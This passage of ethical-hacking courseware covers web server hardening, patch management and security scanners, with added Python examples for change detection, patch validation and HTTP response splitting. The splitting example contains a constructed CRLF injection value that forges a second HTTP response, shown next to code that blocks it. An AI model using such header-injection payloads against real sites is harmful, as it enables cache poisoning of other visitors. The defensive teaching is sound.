- Avoid mapping virtual directories between two different servers or over a network.
- Monitor and check all network services logs, website access logs, database server logs (e.g., Microsoft SQL Server, MySQL, and Oracle), and OS logs frequently.
- Disable the serving of directory listings.
- Eliminate non-web files such as archive files, backup files, text files, and header/include files.
- Disable the serving of certain file types by creating a resource map.
- Ensure that web applications or website files and scripts are stored in a partition or drive separate from that of the OS, logs, and any other system files.
- Run the web server within a sandbox directory to prevent access to system files.
- Prevent all non-web file types from being referenced in a URL.

Detecting Web Server Hacking Attempts
An attacker who gains access to a web server by compromising security through known vulnerabilities present in the web server may attempt to plant backdoors (scripts). These backdoors allow the attacker to retain access, launch phishing attacks, or send spam emails. The victim often remains unaware of the web server attack until the server is blacklisted for spam or until the attacker redirects the visitors of a target site hosted on the web server to some other site. Thus, a web server attack is difficult to detect unless such malicious events occur. By the time these events occur, it may be too late to react because the attacker will already have succeeded. Therefore, a mechanism to detect a web server hacking attempt in its early stages is required to prevent harm to the web server.
When an attacker installs a backdoor on a web server, the files into which it is injected change (typically growing in size) and new files appear. A website change detection system (WDS) is a script that runs on the server to detect changes made to any executable file or the presence of any new file on the web server, such as HTML, JavaScript (JS), PHP, Active Server Pages (ASP), Perl, and Python files. It works by periodically comparing the hash values of the files on the server with their respective master hash values to detect any changes to the codebase. If it detects any change on the server, it alerts the user to take necessary action. Thus, a WDS helps in detecting web server hacking attempts in the early stages of an attack. For example, Directory Monitor is an automated tool that goes through entire web folders, detects any changes made to the codebase, and alerts the user through an email. The master hash list must be kept where the web server process cannot write it (a read-only location or a separate host); an attacker who can modify the code can otherwise also re-baseline the hashes.
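A minimal WDS of the kind just described, as an added example written for this page (it is not Directory Monitor or any other product's code). It records a baseline of SHA-256 hashes for every script or page under a web root, then rescans and reports files that are new, modified, or deleted. The watched file extensions, the web root, and the intrusion it simulates are constructed in a temporary directory for the demo.

```python
"""Added example: hash-baseline website change detection (new / modified / deleted)."""
import hashlib
import json
import os
import tempfile

# File types the text names as backdoor targets, plus a few common server-side ones.
WATCHED_EXT = {".html", ".htm", ".js", ".php", ".asp", ".aspx", ".pl", ".py", ".cgi"}


def file_sha256(path):
    """Stream the file so large assets do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, exts=WATCHED_EXT):
    """Map relative path (forward slashes) -> SHA-256 for every watched file under root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in exts:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                result[rel] = file_sha256(full)
    return result


def diff(baseline, current):
    """Compare the master hash list with a fresh scan."""
    old, new = set(baseline), set(current)
    return {
        "new": sorted(new - old),
        "deleted": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def save_baseline(snap, path):
    with open(path, "w") as f:
        json.dump(snap, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def check(root, baseline_path):
    """One periodic run: rescan and report. All-empty lists means nothing changed."""
    return diff(load_baseline(baseline_path), snapshot(root))


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Constructed scenario: baseline a small site, then simulate an intrusion."""
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "htdocs")
        baseline_file = os.path.join(work, "baseline.json")  # in practice: off-host or read-only
        _write(os.path.join(root, "index.php"), "<?php echo 'hello'; ?>\n")
        _write(os.path.join(root, "inc", "config.php"), "<?php $dsn = 'mysql:host=db'; ?>\n")
        _write(os.path.join(root, "img", "notes.txt"), "not a watched type\n")
        save_baseline(snapshot(root), baseline_file)
        # Intrusion: code appended to an existing page, a new script dropped, a file removed.
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("<?php /* injected stub */ ?>\n")
        _write(os.path.join(root, "inc", "cache.php"), "<?php /* dropped stub */ ?>\n")
        os.remove(os.path.join(root, "inc", "config.php"))
        return check(root, baseline_file)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run snapshot plus save_baseline once after each legitimate deployment and check from cron (or a systemd timer) every few minutes, forwarding any non-empty result to email or a SIEM. Hash comparison catches a changed file only after the fact, which is why the text pairs it with the preventive measures; it does not catch a backdoor that lives purely in the database or in memory.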

How to Defend Against Web Server Attacks
Defenses against web server attacks include the following.
Ports
Monitor all ports on the web server regularly to prevent unnecessary traffic toward the target web server. If traffic is not monitored, the target web server will be vulnerable to malware attacks. Do not expose port 80 (HTTP) or port 443 (HTTPS) to the public without filtering; traffic to these ports should be limited to what the application needs, for example by rate limiting and dropping malformed requests at the firewall or load balancer. If port 80 is left open without such limits, the server will be vulnerable to DoS attacks, which consume server resources. Intranet traffic should either be encrypted or restricted to secure the web server.
Attackers attempt to hide their identity by spoofing the IP address of a legitimate user. By processing the security log file, either using the "deny this IP address" rule in the firewall ruleset file or by creating a "routed blackhole" command, the target system can defend against web server attacks.
Server Certificates
Server certificates guarantee security and are signed by a trusted authority. However, an attacker may compromise certified servers using forged certificates to intercept secure communications by performing MITM attacks. There are various techniques to avoid such MITM attacks. The following are some of them:
- Use the direct validation of certificates.
- Use a novel protocol that does not depend on third parties for certificate validation.
- Allow domains to directly and securely examine their certificates by using previously established user authentication credentials.
- Use a robust cryptographic construction that enhances server identity validation and resolves the limitations of third-party solutions.
- Ensure that the certificate date ranges (validity period) are valid and that certificates are used for their intended purpose.
- Ensure that the certificate has not been revoked and that the certificate's public key chains all the way to a trusted root authority.

Machine.config
The machine.config file provides a mechanism of securing information by changing machine-level settings. It affects all other applications on the machine. The machine.config file includes machine settings for the .NET Framework, which affect the security. The following can be performed with the machine.config file:
- Ensure that protected resources are mapped to HttpForbiddenHandler and that unused HttpModules are removed.
- Ensure that tracing is disabled (<trace enable="false"/>) and that debug compiles are turned off.
- Verify that ASP.NET errors are not returned to the client.
- Verify session state settings.
Code Access Security
The following measures can be adopted to ensure code access security:
- Implement secure coding practices to avoid source-code disclosure and input validation attacks.
- Restrict code access security policy settings to ensure that there are no permissions to execute code downloaded from the Internet or intranet.
- Configure IIS to reject URLs with "../" to prevent path traversal, lock down system commands and utilities with restrictive access control lists (ACLs), and install new patches and updates.
If targets do not implement code access security in their web servers, then there is a possibility of execution of malicious code.
The following are some other measures to defend against web server attacks:
- Apply restricted ACLs and block remote registry administration.
- Secure the SAM (stand-alone servers only).
- Ensure that security-related settings are configured appropriately and that access to the metabase file is restricted with hardened NTFS permissions.
- Remove unnecessary Internet Server Application Programming Interface (ISAPI) filters from the web server.
- Remove all unnecessary file shares, including the default administration shares, if they are not required.
- Secure the shares with restricted NTFS permissions.
- Relocate sites and virtual directories to non-system partitions and use IIS web permissions to restrict access.
- Remove all unnecessary IIS script mappings for optional file extensions to avoid exploitation of any bugs in the ISAPI extensions that handle these types of files.
- Enable a minimum level of auditing on the web server and use NTFS permissions to protect log files.
- Use a dedicated machine as a web server.
- Create URL mappings to internal servers cautiously.
- Do not install the IIS server on a domain controller.
- Use server-side session ID tracking and match connections with timestamps, IP addresses, etc.
- If a database server, such as Microsoft SQL Server, is to be used as a backend database, install it on a separate server.
- Use the security tools provided with web server software and scanners that automate and simplify the process of securing a web server.
- Physically protect the web server machine in a secure machine room.
- Do not connect an IIS server to the Internet until it is fully hardened.
- Do not allow anyone to log in locally to the machine except the administrator.
- Configure a separate anonymous user account for each application, if multiple web applications are hosted.
- Limit the server functionality to support only the web technologies to be used.
- Screen and filter incoming traffic requests.
- Store website files and scripts on a separate partition or drive.

How to Defend against HTTP Response-Splitting and Web Cache Poisoning
While setting cookies, remove carriage returns (CRs) and line feeds (LFs) before inserting data into an HTTP response header; better still, reject such a value outright, because stripping can leave behind an encoded variant that a later decoding step turns back into a line break. The best practice is to use third-party products to test for the existence of security holes and defend against CRLF injection. Ensure that application engines are up to date.
For the DNS cache poisoning variant, the User Datagram Protocol (UDP) source port randomization technique defends servers against blind response forgery. Limit the number of simultaneous recursive queries and increase the times-to-live (TTLs) of legitimate records.
The following are some methods to defend against HTTP response-splitting attacks and web cache poisoning:
Server Admin
- Use the latest web server software.
- Regularly update/patch the OS and web server.
- Run a web vulnerability scanner.
Application Developers
- Restrict the web application's access to unique IPs.
- Disallow CR (%0d or \r) and LF (%0a or \n) characters.
- Comply with the RFC 2616 specifications for HTTP/1.1 (since superseded by RFC 7230 and later RFC 9112, which keep the same rule that CR and LF may not appear inside a header field value).
- Parse all user inputs or other forms of encoding before using them in HTTP headers.
Proxy Servers
- Avoid sharing incoming TCP connections among different clients.
- Use different TCP connections with the proxy for different virtual hosts.
- Implement "maintain request host header" correctly.
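The header-level check the developer bullets above call for, as an added example written for this page (not code from the original text). build_response() assembles an HTTP/1.1 response the naive way; with a cookie value that carries CR LF it emits two responses in one stream, the second attacker-controlled, which is exactly what a shared proxy cache or browser would then store. safe_header_value() rejects rather than strips CR, LF and NUL so the injection fails closed. The injected value and the headers are constructed for the demo.

```python
"""Added example: HTTP response splitting via an unchecked Set-Cookie value, and the fix."""

CRLF = b"\r\n"


class HeaderInjection(ValueError):
    """Raised when a header value would terminate the header or the header block."""


def safe_header_value(value):
    """Reject CR, LF and NUL instead of stripping them, so the request fails closed."""
    if isinstance(value, bytes):
        value = value.decode("latin-1")
    if any(c in value for c in "\r\n\0"):
        raise HeaderInjection("control character in header value: %r" % value)
    return value


def build_response(status, headers, body=b"", safe=False):
    """Serialize an HTTP/1.1 response; safe=True validates every header value first."""
    lines = [("HTTP/1.1 %s" % status).encode("latin-1")]
    for name, value in headers:
        if safe:
            value = safe_header_value(value)
        lines.append(("%s: %s" % (name, value)).encode("latin-1"))
    lines.append(("Content-Length: %d" % len(body)).encode("latin-1"))
    return CRLF.join(lines) + CRLF + CRLF + body


def count_status_lines(stream):
    """How many responses a downstream parser (proxy cache, browser) sees in the stream."""
    return sum(1 for line in stream.split(CRLF) if line.startswith(b"HTTP/1.1 "))


# Constructed attack input. On the wire it arrives URL-encoded in a parameter, e.g.
# ?lang=en%0d%0aContent-Length%3a%200%0d%0a%0d%0aHTTP/1.1%20200%20OK..., and the
# application decodes it before echoing it into Set-Cookie.
INJECTED_LANG = (
    "en\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 14\r\n\r\n<h1>Owned</h1>"
)


def demo():
    """Return (responses seen in the unsafe stream, whether the safe path blocked it)."""
    headers = [("Location", "/home"), ("Set-Cookie", "lang=" + INJECTED_LANG)]
    unsafe = build_response("302 Found", headers)
    try:
        build_response("302 Found", headers, safe=True)
        blocked = False
    except HeaderInjection:
        blocked = True
    return count_status_lines(unsafe), blocked


if __name__ == "__main__":
    seen, blocked = demo()
    print("unsafe stream contains %d responses; safe path blocked: %s" % (seen, blocked))
```

The first response in the split stream is the legitimate 302 with a zero-length body; the second is the attacker's page, and a cache that keys on the next request in the pipeline stores it for every later visitor, which is the cache-poisoning half of the attack. Modern frameworks and Python's own http.client already refuse header values with these characters; the check is for code that assembles headers by hand or on older stacks.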

How to Defend against DNS Hijacking
The following techniques can be used to defend against DNS hijacking:
- Choose a registrar accredited by the Internet Corporation for Assigned Names and Numbers (ICANN) and encourage them to set REGISTRAR-LOCK on the domain name.
- Safeguard the registrant's account information.
- Include DNS hijacking in incident response and business continuity planning.
- Use DNS monitoring tools/services to monitor the IP address of the DNS server and set up alerts.
- Avoid downloading audio and video codecs and other downloaders from untrusted websites.
- Install an antivirus program and update it regularly.
- Change the default router password.
- Restrict zone transfers and use script blockers in the browser.
- Domain Name System Security Extensions (DNSSEC): DNSSEC adds digital signatures to DNS records so that a validating resolver can verify that an answer is authentic and unaltered. It defends against forged responses; it does not encrypt queries and does nothing against a compromised registrar account.
- Strong Password Policies and User Management: The use of strong passwords further enhances security.
- Better Service Level Agreements (SLAs) from DNS Service Providers: When signing up for DNS servers with DNS service providers, learn who to contact when an issue occurs, how to receive good-quality reception and support, and whether the DNS server's infrastructure is hardened against attacks.
- Configuring a Master-Slave DNS within your Network: Use a master-slave DNS and configure the master without Internet access. Maintain two slave servers so that even if an attacker hacks a slave, it will update only when it receives an update from the master.
- Constant Monitoring of DNS Servers: The constant monitoring of DNS servers ensures that a domain name returns the correct IP address.
- Ensure Router Safety: Change the default username and password of the router. Keep the firmware up to date to ensure safety from new vulnerabilities.
- Use VPN Service: Establish virtual private network (VPN)-encrypted tunnels for secure private communication over the Internet. This feature protects messages from eavesdropping and unauthorized access.

Module Flow: Web Server Concepts; Web Server Attacks; Web Server Attack Methodology; Web Server Attack Tools; Countermeasures; Patch Management; Web Server Security Tools
Patch Management
Developers always attempt to find bugs in a web server and fix them in the form of patches. Bug fixes are distributed as patches, which provide protection against known vulnerabilities. An unpatched server, or a patch that is itself flawed, can create a security loophole in the web server. This section describes the role of patches, upgrades, and hotfixes in securing web servers. This section also provides guidance for choosing proper patches, upgrades, and hotfixes, and their appropriate sources for secure patch management.

Patches and Hotfixes
A patch is a small piece of software designed to fix problems, security vulnerabilities, and bugs as well as improve the usability or performance of a computer program or its supporting data. A patch can be considered a repair job for a programming problem. A software vulnerability is a weakness of a software program that makes it susceptible to malware attacks. Software vendors provide patches that prevent exploitation and reduce the probability of threats exploiting a specific vulnerability. Patches include fixes and updates for multiple known bugs or issues. A patch is a publicly released update that is available for all customers. A system without patches is much more vulnerable to attacks than a regularly patched system. If an attacker can identify a vulnerability before it is fixed, then the system might be susceptible to malware attacks.
A hotfix is a package used to address a critical defect in a live environment and contains a fix for a single issue. It updates a specific product version. Hotfixes provide quick solutions and ensure that the specific issue is resolved on production systems ahead of the next cumulative patch. Vendors update users about the latest hotfixes through email or make them available on their official website. Hotfixes are updates that fix a specific customer issue and are not always distributed outside the customer organization. Vendors occasionally deliver hotfixes as a set of fixes called a combined hotfix or service pack.

What is Patch Management?


According to http://searchenterprisedesktop.techtarget.com, patch management is an area of systems management that involves acquiring, testing, and installing multiple patches (code changes) in an administered computer system. Patch management is a method of defense against vulnerabilities that cause security weaknesses or corrupt data. It is a process of scanning for network vulnerabilities, detecting missed security patches and hotfixes, and then deploying the relevant patches as soon as they are available to secure the network. It involves the following tasks:
▪ Choosing, verifying, testing, and applying patches
▪ Updating previously applied patches with current patches
▪ Listing patches applied previously to the current software
▪ Recording repositories or depots of patches for easy selection
▪ Assigning and deploying the applied patches
An automated patch management process includes the following steps:
▪ Detect: Use tools to detect missing security patches.
▪ Assess: Assess the issue(s) and its associated severity by mitigating the factors that may influence the decision.
▪ Acquire: Download the patch for testing.
▪ Test: Install the patch first on a test machine to verify the consequences of the update.
▪ Deploy: Deploy the patch to computers and ensure that applications are not affected.
▪ Maintain: Subscribe to receive notifications about vulnerabilities when they are reported.
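The Detect and Assess steps above, worked through in code. This is an added example and not part of the courseware or of any vendor's tool: the advisory feed, the installed inventory, the product names, version numbers and patch identifiers are all constructed sample data, and "Internet-facing" is the one mitigating factor used here to order patches of equal severity.

```python
"""Detect and assess missing patches against a vendor advisory feed.

Added example (not from the courseware): the advisory feed, the installed
inventory and the severity scale are constructed sample data.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Advisory:
    product: str
    fixed_version: tuple      # first version that contains the fix, e.g. (2, 4, 54)
    severity: str             # "critical", "high", "medium" or "low"
    patch_id: str             # vendor patch identifier (placeholder values below)


# Constructed advisory feed; products and version numbers are illustrative.
ADVISORIES = [
    Advisory("httpd", (2, 4, 54), "critical", "VENDOR-PATCH-0001"),
    Advisory("openssl", (3, 0, 7), "high", "VENDOR-PATCH-0002"),
    Advisory("php", (8, 1, 12), "medium", "VENDOR-PATCH-0003"),
    Advisory("nginx", (1, 22, 1), "high", "VENDOR-PATCH-0004"),
]

# Constructed inventory: what is currently installed on the administered host.
INSTALLED = {"httpd": (2, 4, 49), "openssl": (3, 0, 7), "php": (8, 1, 2)}

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def parse_version(text):
    """Turn '2.4.54' into (2, 4, 54) so that versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def detect_missing(installed, advisories):
    """Detect step: return advisories whose fixed version is newer than what is installed.

    Products that are not installed at all are skipped: an advisory for software
    the host does not run is noise, not a missing patch.
    """
    missing = []
    for adv in advisories:
        current = installed.get(adv.product)
        if current is not None and current < adv.fixed_version:
            missing.append(adv)
    return missing


def assess(missing, internet_facing):
    """Assess step: order the backlog by severity, then by exposure.

    `internet_facing` is the set of product names reachable from the Internet;
    within one severity, exposed products come first.
    """
    return sorted(
        missing,
        key=lambda adv: (SEVERITY_RANK[adv.severity], adv.product not in internet_facing),
    )


def patch_plan(installed, advisories, internet_facing):
    """Return patch ids in the order they should be acquired and tested."""
    ordered = assess(detect_missing(installed, advisories), internet_facing)
    return [adv.patch_id for adv in ordered]


if __name__ == "__main__":
    for adv in assess(detect_missing(INSTALLED, ADVISORIES), {"httpd", "php"}):
        print(f"{adv.severity:8} {adv.product:8} {INSTALLED[adv.product]} -> "
              f"{adv.fixed_version}  {adv.patch_id}")
```

The version tuples matter: comparing "2.4.9" and "2.4.54" as strings would put the older build after the newer one, which is a common source of false "fully patched" results.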
Installation of a Patch
The installation of a patch entails the following tasks.
▪ Identifying Appropriate Sources for Updates and Patches
Itis important to identifyappropriate sources for updates and patches. Patches and
updates that are not installedfromtrustedsources can renderthe targetserver even
more vulnerableto attacks, insteadof hardening its security. Thus, the selectionof
appropriatesources for updates andpatchesplays a vital rolein securing web servers.
The following are some methodsfor identifying appropriate sources for updates and
patches.
o Create a patch management plan that fits the operational environment and business objectives.
o Find appropriate updates and patches on the home sites of the applications or OS vendors. The recommended method of tracking issues relevant to proactive patching is to register to the home sites to receive alerts.
▪ Installation of a Patch
Users can access and install security patches via the World Wide Web. Patches can be installed in two ways.
o Manual Installation
In this method, the user downloads the patch from the vendor and installs it.
o Automatic Installation
In this method, applications use an auto update feature to update themselves.
▪ Implementation and Verification of a Security Patch or Upgrade
o Before installing any patch, verify the source.
o Use a proper patch management program to validate file versions and checksums before deploying security patches.
o The patch management tool must be able to monitor the patched systems.
o The patch management team should check for updates and patches regularly.
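The checksum and file-version validation listed above, as an added example that is not part of the courseware. The patch bytes, the vendor manifest and the version strings are constructed inline so the check runs offline; in a real rollout the expected digest and the "applies to" version come from the vendor's advisory, and the file itself is hashed from disk with the same chunked loop.

```python
"""Validate a downloaded patch before deployment: checksum and version gate.

Added example (not from the courseware). The vendor manifest, the patch bytes and
the expected version are constructed inline so the check runs offline.
"""
import hashlib
import hmac

# Constructed patch payload standing in for a downloaded file.
PATCH_BYTES = b"PATCH-CONTENT: hotfix for product X build 1204\n"

# Constructed vendor manifest: the digest the vendor publishes for the file and
# the product version the patch targets.
MANIFEST = {
    "sha256": hashlib.sha256(PATCH_BYTES).hexdigest(),
    "applies_to_version": "1.2.3",
}


def sha256_of(data, chunk_size=1 << 16):
    """Hash bytes in chunks, the same shape as hashing a large file stream."""
    digest = hashlib.sha256()
    for offset in range(0, len(data), chunk_size):
        digest.update(data[offset:offset + chunk_size])
    return digest.hexdigest()


def checksum_matches(data, expected_hex):
    """Compare digests with a constant-time comparison."""
    return hmac.compare_digest(sha256_of(data), expected_hex.lower())


def version_matches(installed_version, applies_to):
    """Refuse a patch built for a different product version."""
    return installed_version == applies_to


def validate_patch(data, manifest, installed_version):
    """Return (ok, reason). Only a (True, 'ok') result should reach deployment."""
    if not checksum_matches(data, manifest["sha256"]):
        return False, "checksum mismatch: file is corrupt or is not the vendor's build"
    if not version_matches(installed_version, manifest["applies_to_version"]):
        return False, (f"patch targets {manifest['applies_to_version']}, "
                       f"host runs {installed_version}")
    return True, "ok"


if __name__ == "__main__":
    print(validate_patch(PATCH_BYTES, MANIFEST, "1.2.3"))
    print(validate_patch(PATCH_BYTES + b"x", MANIFEST, "1.2.3"))
    print(validate_patch(PATCH_BYTES, MANIFEST, "1.2.4"))
```

A checksum only proves the file is the one the vendor published if the digest itself was obtained over a trusted channel (the vendor's HTTPS site or a signed advisory), which is why the text insists on verifying the source before anything else.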

Patch Management Tools
▪ GFI LanGuard
Source: https://www.gfi.com
The GFI LanGuard patch management software scans the user's network automatically as well as installs and manages security and non-security patches. It supports machines across Microsoft®, MAC OS X®, and Linux® operating systems, as well as many third-party applications. It allows auto-downloads of missing patches as well as patch rollback, resulting in a consistently configured environment that is protected from threats and vulnerabilities.

Figure 13.45: Screenshot of GFI LanGuard
The following are some additional patch management software tools:
▪ Symantec Client Management Suite (https://www.symantec.com)
▪ SolarWinds Patch Manager (https://www.solarwinds.com)
▪ Kaseya Patch Management (https://www.kaseya.com)
▪ Software Vulnerability Manager (https://www.flexerasoftware.com)
▪ Ivanti Patch for Endpoint Manager (https://www.ivanti.com)

Web Server Security Tools
This section describes common web server security tools that secure a web server against possible attacks. These tools scan for vulnerabilities in a target server and web applications, send alerts in the case of hacking attempts, scan for malware in the web server, and perform other security assessment activities.

Web Application Security Scanners
▪ Syhunt Hybrid
Source: http://www.syhunt.com
The Syhunt Hybrid scanner automates web application security testing and guards the organization's web infrastructure against web application security threats. Syhunt Dynamic crawls websites and detects XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks. Syhunt Hybrid creates signatures to detect application vulnerabilities and prevents logout. It analyzes JavaScript (JS), logs suspicious responses, and tests errors for review.

Figure 13.46: Screenshot of Syhunt Hybrid web application security scanner
▪ N-Stalker X
Source: https://www.nstalker.com
N-Stalker is a web application security scanner that searches for vulnerabilities to attacks such as clickjacking, SQL injection, and XSS. It allows spider crawling throughout the application and the creation of web macros for form authentication. It also provides proxy capabilities for "drive-thru" attacks and identifies components through reverse proxies that distribute different platforms in the same application URL.

Figure 13.47: Screenshot of N-Stalker X
The following are some additional web application security scanners:
▪ Netsparker (https://www.netsparker.com)
▪ Burp Suite (https://www.portswigger.net)
▪ Wapiti (http://wapiti.sourceforge.net)
▪ WebScarab (https://www.owasp.org)
▪ WPSec (https://wpsec.com)
▪ Tinfoil Security (https://www.tinfoilsecurity.com)
▪ Skipfish (https://code.google.com)
▪ Detectify (https://detectify.com)
▪ Fortify on Demand (https://www.microfocus.com)
▪ OWASP Zed Attack Proxy (ZAP) (https://www.zaproxy.org)
▪ SonarQube (https://www.sonarqube.org)
▪ Arachni (https://www.arachni-scanner.com)
▪ w3af (http://w3af.org)
▪ Grabber (http://rgaucher.info/beta/grabber)
▪ Vega (https://subgraph.com)

Web Server Security Scanners
▪ ScanMyServer
Source: https://www.scanmyserver.com
ScanMyServer is used to find security vulnerabilities in a website or web server. It can generate comprehensive security test reports and assist in fixing problems that might exist in a company's website or web server.

Figure 13.48: Screenshot of ScanMyServer

The following are some additional web server security scanners:
▪ Qualys Community Edition (https://www.qualys.com)
▪ Observatory (https://observatory.mozilla.org)
▪ WordPress Security Scan (https://hackertarget.com)
▪ Web Vulnerability Scanner (https://pentest-tools.com)
▪ Nikto2 (https://cirt.net)

Web Server Malware Infection Monitoring Tools
▪ QualysGuard Malware Detection
Source: https://www.qualys.com
QualysGuard Malware Detection allows organizations to proactively scan their websites for malware and provides automated alerts and in-depth reporting to enable prompt identification and resolution. It enables organizations to protect their customers from malware infections and safeguard their brand reputation.

Figure 13.49: Screenshot of QualysGuard Malware Detection
The following are some additional web server malware infection monitoring tools:
▪ Sucuri SiteCheck (https://sucuri.net)
▪ SiteLock SMART (https://www.sitelock.com)
▪ Quttera (https://www.quttera.com)
▪ Web Inspector (https://www.webinspector.com)
▪ SiteGuarding (https://www.siteguarding.
Web Server Security Tools
▪ Fortify WebInspect
Source: http://www.microfocus.com
Fortify WebInspect is an automated dynamic testing solution that discovers configuration issues as well as identifies and prioritizes security vulnerabilities in running applications. It mimics real-world hacking techniques and provides a comprehensive dynamic analysis of complex web applications and services. WebInspect dashboards and reports provide organizations with visibility and an accurate risk posture of its applications.

Figure 13.50: Screenshot of Fortify WebInspect
The following are some additional web server security tools:
▪ Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
▪ Retina Host Security Scanner (https://www.beyondtrust.com)
▪ NetIQ Secure Configuration Manager (https://www.netiq.com)
▪ SAINT Security Suite (https://www.carson-saint.com)
▪ Sophos Intercept X for Server (https://www.sophos.com)
Web Server Pen Testing Tools
▪ CORE Impact
Source: https://www.coresecurity.com
CORE Impact finds vulnerabilities in an organization's web server. This tool allows a user to evaluate the security posture of a web server by using the same techniques currently employed by cyber criminals. It scans for possible vulnerabilities in the web server, imports scan results, and runs exploits to test the identified vulnerabilities. It can also scan network servers, workstations, firewalls, routers, and various applications for vulnerabilities; identify which vulnerabilities pose real threats to the network; determine the potential impact of exploited vulnerabilities; and prioritize and execute remediation efforts.

Figure 13.51: Screenshot of CORE Impact
The following are some additional web server pen testing tools:
▪ Immunity CANVAS (https://www.immunityinc.com)
▪ Arachni (https://www.arachni-scanner.com)
▪ WebSurgery (http://sunrisetech.gr)
Module Summary
In this module, we discussed in detail general concepts related to web servers; various web server threats and attacks; the web server attack methodology, which includes information gathering, web server footprinting, website mirroring, vulnerability scanning, session hijacking, and web server passwords hacking; and various web server hacking tools. Additionally, we discussed various countermeasures that can be employed to prevent web server hacking attempts by threat actors. We also discussed patch management concepts. This module ended with a detailed discussion on how to secure web servers using various security tools.
In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, hack web applications.

Certified Ethical Hacker
Module 14: Hacking Web Applications

Module Objectives
The evolution of the Internet and web technologies, combined with rapidly increasing Internet connectivity, has led to the emergence of a new business landscape. Web applications are an integral component of online businesses. Everyone connected via the Internet is using various web applications for different purposes, including email, chats, online shopping, and social networking.
Web applications are becoming increasingly vulnerable to more sophisticated threats and attack vectors. This module will familiarize you with various web applications and web attack vectors as well as how to protect an organization's information resources from them. It describes the general web application hacking methodology that most attackers use to exploit a target system. Ethical hackers can use this methodology to assess their organization's security against web application attacks. This module will also familiarize you with web API, webhooks, and web shell concepts as well as hacking. In addition, it discusses several tools that are useful in different stages of web application security assessment.

At the end of this module, you will be able to:
▪ Describe web application concepts
▪ Perform various web application attacks
▪ Describe the web application hacking methodology
▪ Use different web application hacking tools
▪ Explain web API, webhooks, and web shell concepts
▪ Understand how to hack web applications via web API, webhooks, and web shells
▪ Adopt countermeasures against web application attacks
▪ Use different web application security testing tools

Web Application Concepts
This section describes the basic concepts associated with web applications vis-à-vis security concerns: their components, how they work, their architecture, and so on. Furthermore, it provides insights into web services and vulnerability stacks.

Introduction to Web Applications
Web applications are software programs that run on web browsers and act as the interface between users and web servers through web pages. They enable the users to request, submit, and retrieve data to/from a database over the Internet by interacting through a user-friendly graphical user interface (GUI). Users can input data via a keyboard, mouse, or touch interface depending on the device they are using to access the web application. Based on browser-supported programming languages such as JavaScript, HTML, and CSS, web applications work in combination with other programming languages such as SQL to access data from the databases. Web applications are developed as dynamic web pages, and they allow users to communicate with servers using server-side scripts. They allow users to perform specific tasks such as searching, sending emails, connecting with friends, online shopping, and tracking and tracing. Furthermore, there are several desktop applications that provide users with the flexibility to work with the Internet.
Entities develop various web applications to offer their services to users via the Internet. Whenever users need to access such services, they can request them by submitting the Uniform Resource Identifier (URI) or Uniform Resource Locator (URL) of the web application in a browser. The browser passes this request to the server, which stores the web application data and displays it in the browser. Some popular web servers are Microsoft IIS, Apache HTTP Server, H2O, LiteSpeed, Cherokee, etc.
Increasing Internet usage and expanding online businesses have accelerated the development and ubiquity of web applications across the globe. A key factor in the adoption of web applications for business purposes is the multitude of features that they offer. Moreover, they are secure and relatively easy to develop. In addition, they offer better services than many computer-based software applications and are easy to install, maintain, and update.
The advantages of web applications are listed below:
▪ As they are independent of the operating system, their development and troubleshooting are easy and cost-effective.
▪ They are accessible anytime and anywhere using a computer with an Internet connection.
▪ The user interface is customizable, making it easy to update.
▪ Users can access them on any device having an Internet browser, including PDAs, smartphones, etc.
▪ Dedicated servers, monitored and managed by experienced server administrators, store all the application data, allowing developers to increase their physical capacity.
▪ Multiple locations of web servers not only increase workload capacity but also reduce the security burden of monitoring thousands of desktops using the program.
▪ They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL Server, .NET, and scripting languages, which are scalable and support even portable platforms.
Although web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, and session hijacking.
How Web Applications Work
The main function of web applications is to fetch user-requested data from a database. When a user clicks or enters a URL in a browser, the web application immediately displays the requested website content in the browser. This mechanism involves the following steps:
▪ First, the user enters the website name or URL in the browser. Then, the user's request is sent to the web server.
▪ On receiving the request, the web server checks the file extension:
o If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
o If the user requests a web page with an extension such as php, asp, and cfm that needs to be processed at the server side, then the web application server must process the request. Therefore, the web server passes the user's request to the web application server, which processes the user's request.
▪ The web application server then accesses the database to perform the requested task by updating or retrieving the information stored on it.
▪ After processing the request, the web application server finally sends the results to the web server, which in turn sends the results to the user's browser.
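The request flow described in the steps above, traced in code. This is an added example, not code from the courseware or from any web server: a `web_server` function makes the extension decision (serve .htm/.html itself, hand .php/.asp/.cfm to the application server, refuse everything else), and an `application_server` function runs the one server-side script that exists here against an in-memory database. The document root, the `/product.php` script and the product rows are all constructed.

```python
"""Trace a request through web server -> application server -> database.

Added example (not from the courseware). Models the dispatch decision the text
describes: static .htm/.html pages are served by the web server, server-side
pages (.php/.asp/.cfm) go to the application server, which queries the database.
"""
import os
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed "document root": static files the web server can serve directly.
STATIC_FILES = {
    "/index.html": "<h1>Welcome</h1>",
    "/about.htm": "<p>About us</p>",
}

STATIC_EXTENSIONS = {".htm", ".html"}
DYNAMIC_EXTENSIONS = {".php", ".asp", ".cfm"}


def build_database():
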